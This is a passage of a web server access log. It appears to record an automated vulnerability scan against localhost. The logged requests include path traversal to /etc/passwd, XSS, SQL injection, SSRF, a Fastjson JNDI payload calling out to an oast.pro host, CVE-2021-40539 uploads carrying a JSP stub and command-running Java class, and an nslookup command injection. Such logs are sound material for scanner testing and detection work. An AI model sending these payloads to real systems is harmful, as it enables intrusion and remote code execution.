"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2tuc8smpv1g2s80ca0ceo1f54jqqnz4.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20ca2tuc8smpv1g2s80ca0x1kwdwgga5eg8.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 